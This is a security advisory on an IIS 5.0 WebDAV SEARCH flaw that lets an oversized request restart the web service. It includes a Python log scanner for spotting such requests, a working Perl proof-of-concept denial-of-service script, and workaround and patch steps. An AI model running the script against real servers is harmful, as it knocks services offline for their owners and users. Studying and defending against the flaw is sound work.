IIS 5.0 SEARCH Method Remote Attack Vulnerability

/ns/ld/win/data/20010720222805.htm

Affected systems:
Microsoft IIS 5.0
+ Microsoft Windows NT 2000
Description:
--------------------------------------------------------------------------------


WebDAV is an extension of the HTTP protocol that allows web content to be authored and managed remotely. The WebDAV implementation in Microsoft IIS 5.0 mishandles certain malformed requests: submitting an oversized SEARCH request causes the IIS service to restart.

<* Source: Georgi Guninski (guninski@GUNINSKI.COM)
http://www.guninski.com
*>
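From a defender's side, the request shape described above (a SEARCH request whose body is far larger than any legitimate DAV:sql query) is easy to pick out of IIS W3C extended logs once the cs-bytes column (bytes sent by the client) is enabled. The following Python script is an added example, not part of the advisory or of Guninski's code: it reads the `#Fields:` directive so it adapts to whatever columns are logged, and flags SEARCH requests above a size threshold. The log lines are constructed, and the 64 KiB threshold is an assumed value chosen to sit well below the roughly 126 KB the test program sends.

```python
"""Flag oversized WebDAV SEARCH requests in IIS W3C extended log data.

Added example (not from the advisory): parses the '#Fields:' header so it
works with whatever columns are enabled, then reports SEARCH requests whose
client-sent byte count (cs-bytes) exceeds a threshold.
"""
from collections import Counter
from typing import Dict, Iterator, List

# Assumed threshold: a legitimate DAV:sql SEARCH body is a few hundred bytes,
# while the advisory's test program sends roughly 126,000 bytes.
SEARCH_BYTES_LIMIT = 65536

# Constructed sample log in IIS W3C extended format (not real traffic).
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 5.0
#Version: 1.0
#Date: 2001-07-20 22:28:05
#Fields: date time c-ip cs-method cs-uri-stem sc-status cs-bytes
2001-07-20 22:28:05 10.0.0.5 GET /default.htm 200 312
2001-07-20 22:28:06 10.0.0.5 PROPFIND /docs/ 207 441
2001-07-20 22:28:07 192.0.2.9 SEARCH / 500 126217
2001-07-20 22:28:08 192.0.2.9 SEARCH / - 126217
2001-07-20 22:28:09 10.0.0.7 SEARCH /docs/ 207 603
"""


def parse_w3c(text: str) -> Iterator[Dict[str, str]]:
    """Yield one dict per log record, keyed by the names in '#Fields:'."""
    fields: List[str] = []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]   # column names follow the directive
            continue
        if not line.strip() or line.startswith("#"):
            continue                    # other directives / blank lines
        values = line.split()
        if not fields or len(values) != len(fields):
            continue                    # no header yet or malformed record
        yield dict(zip(fields, values))


def is_oversized_search(rec: Dict[str, str], limit: int = SEARCH_BYTES_LIMIT) -> bool:
    """True for a SEARCH request whose client-sent bytes exceed `limit`.

    The status code is deliberately ignored: if the service restarts while
    handling the request there may be no meaningful status to log.
    """
    if rec.get("cs-method", "").upper() != "SEARCH":
        return False
    try:
        sent = int(rec.get("cs-bytes", ""))
    except ValueError:
        return False                    # cs-bytes missing or '-'
    return sent > limit


def find_oversized_search(text: str, limit: int = SEARCH_BYTES_LIMIT) -> List[Dict[str, str]]:
    """Return every record in `text` that is_oversized_search() flags."""
    return [rec for rec in parse_w3c(text) if is_oversized_search(rec, limit)]


def hits_by_client(hits: List[Dict[str, str]]) -> Dict[str, int]:
    """Count flagged requests per client address for triage."""
    return dict(Counter(rec.get("c-ip", "?") for rec in hits))


if __name__ == "__main__":
    flagged = find_oversized_search(SAMPLE_LOG)
    for rec in flagged:
        print(f"{rec['date']} {rec['time']} {rec['c-ip']} SEARCH {rec['cs-uri-stem']} "
              f"cs-bytes={rec['cs-bytes']} sc-status={rec['sc-status']}")
    print("per client:", hits_by_client(flagged))
```

The check keys on method and request size rather than on the response status, because a request that takes the service down may be logged with no status at all; lowering `limit` trades fewer misses for more noise from large but legitimate SEARCH bodies.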


Test program:
--------------------------------------------------------------------------------

WARNING

The following program (method) may be offensive in nature and is provided for security research and teaching only. Use at your own risk!

Georgi Guninski (guninski@GUNINSKI.COM) provided the following test code:
--vv6.pl-------------------------------------------------------------
#!/usr/bin/perl
# Proof of concept: sends an oversized WebDAV SEARCH request to IIS 5.0.
use IO::Socket;
printf "IIS 5.0 SEARCH\nWritten by Georgi Guninski wait some time\n";
if(@ARGV < 2) { die "\nUsage: IIS5host port \n"; }
$port = $ARGV[1];
$host = $ARGV[0];
sub vv
{
$ll=$_[0]; #length of buffer
$ch=$_[1]; #character used to fill the buffer
$socket = IO::Socket::INET->new(PeerAddr => $host,PeerPort => $port,Proto => "TCP") || return;
$over=$ch x $ll; #string to overflow
# SEARCH body: a DAV:sql query whose SCOPE() argument is the oversized string
$xml='<?xml version="1.0"?><D:searchrequest xmlns="DAV:"><D:sql>SELECT DAV:displayname from SCOPE("'.$over.'")</D:sql></D:searchrequest>'."\n";
$l=length($xml);
$req="SEARCH / HTTP/1.1\nContent-type: text/xml\nHost: $host\nContent-length: $l\n\n$xml\n\n";
syswrite($socket,$req,length($req));
print ".";
$socket->read($res,3000); #read whatever the server answers, if anything
print "r=".$res;
close $socket;
}
vv(126000,"V");
sleep(1);
vv(126000,"V");
#Try 125000 - 128000
---------------------------------------------------------------

--------------------------------------------------------------------------------
Recommendations:

Temporary workaround:

Microsoft has provided a temporary workaround that disables WebDAV (http://www.microsoft.com/technet/support/kb.asp?ID=241520):
1. Stop the IIS service first. At a command prompt, run "IISRESET /STOP".
2. Deny Everyone access to Httpext.dll:
CACLS %SystemRoot%\System32\Inetsrv\httpext.dll /D Everyone
3. Start the IIS service again: IISRESET /START

Vendor patch:

Microsoft has released a security bulletin (MS01-016) for this issue:
http://www.microsoft.com/technet/security/bulletin/MS01-016.asp

Patch (English version only at this time):

Microsoft IIS 5.0:
http://www.microsoft.com/Downloads/Release.asp?ReleaseID=28564